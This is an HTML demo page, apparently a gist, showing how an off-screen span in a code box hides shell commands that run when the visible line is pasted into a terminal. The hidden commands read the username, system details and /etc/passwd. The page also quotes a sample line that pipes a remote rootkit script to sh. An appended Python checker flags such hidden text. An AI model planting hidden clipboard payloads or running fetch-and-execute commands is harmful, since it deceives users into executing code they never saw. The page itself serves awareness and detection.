copy / paste hijack trick
<html>
<head>
<title>sneaky copy-paste terminal example</title>
<style>
.codeblock {
background-color: lightyellow;
border: 1px dotted black;
margin-left: 50px;
display: inline-block;
}
</style>
</head>
<body>
<h3>intro</h3>
<p>
<font size=3> This shows an example of how it is dangerous to copy and paste lines of code from a website into your terminal, even if they are seemingly plaintext. I'm not talking about that shit where it's obviously bad to run something like <i>wget http://evilhax.or/rootkit.sh -O - | sh</i><br>Oh no, my friends. This is far worse. This is not anything new to the world, I had just happened to see it mentioned elsewhere earlier today and I found it interesting.</p>
<h3>hax</h3>
<ul>
<li>select the line of code in the box below with your mouse</li>
<li>copy it using ctrl+c (cmd+c on osx, whatever...)</li>
<li>paste it into your terminal</li>
<li>be..fucking...amazed...</li>
</ul>
<p class="codeblock">
wget <span style="position: absolute; left: -100px; top: -100px">/dev/null; clear; echo -n "Hey there ";whoami|tr -d '\n';echo -e "\nheres some info from your box:\n";uname -a; hostname; head -n1 /etc/passwd<br></span>http://www.nullable.software/hi/copypasta.html
</p>
<h3>references</h3>
<ul>
<li> http://www.ush.it/team/ascii/hack-tricks_253C_CCC2008/wysinwyc/what_you_see_is_not_what_you_copy.txt</li>
<li> http://www.reddit.com/r/netsec/comments/1bv359/dont_copypaste_from_website_to_terminal_demo/</li>
</ul>
</font>
</body>
</html>
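
Added example, not part of the original gist: a static check that reproduces the gap between what the code box shows and what a selection puts on the clipboard, flagging text moved off-screen by an inline style and any line break that would make the shell run the paste immediately. The style heuristic, the names `CopyAudit` and `audit`, and the sample markup are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Assumed heuristic: inline styles that move text out of view but leave it selectable.
OFFSCREEN = re.compile(
    r"(left|top|text-indent)\s*:\s*-\d|font-size\s*:\s*0|opacity\s*:\s*0(\.0+)?\s*(;|$)", re.I)
VOID = {"br", "img", "hr", "input", "meta", "link", "wbr"}
# Constructed sample with the same structure as the gist's code box (harmless hidden text).
SAMPLE = ('<p class="codeblock">git clone <span style="position: absolute; left: -100px; '
          'top: -100px">/dev/null; echo hidden<br></span>https://example.com/repo.git</p>')

class CopyAudit(HTMLParser):
    """Collects the text a reader sees and the text a selection would copy."""
    def __init__(self):
        super().__init__()
        self.stack = []                      # per open element: inside a hidden subtree?
        self.visible, self.copied = [], []

    def _hidden(self):
        return bool(self.stack) and self.stack[-1]

    def handle_starttag(self, tag, attrs):
        if tag == "br":                      # a <br> becomes a newline on the clipboard
            self.copied.append("\n")
            if not self._hidden():
                self.visible.append("\n")
        if tag in VOID:                      # void elements never get an end tag
            return
        style = dict(attrs).get("style") or ""
        self.stack.append(self._hidden() or bool(OFFSCREEN.search(style)))

    def handle_endtag(self, tag):
        if tag not in VOID and self.stack:
            self.stack.pop()

    def handle_data(self, data):
        self.copied.append(data)             # selection copies hidden text too
        if not self._hidden():
            self.visible.append(data)

def audit(html):
    parser = CopyAudit()
    parser.feed(html)
    parser.close()
    visible = "".join(parser.visible).strip()
    copied = "".join(parser.copied).strip()
    return {"visible": visible, "copied": copied,
            "hidden_text": visible != copied,    # clipboard differs from what is shown
            "runs_on_paste": "\n" in copied}     # newline executes before the user can review
```

The parser assumes balanced tags, so run it on a single extracted code box rather than a whole page.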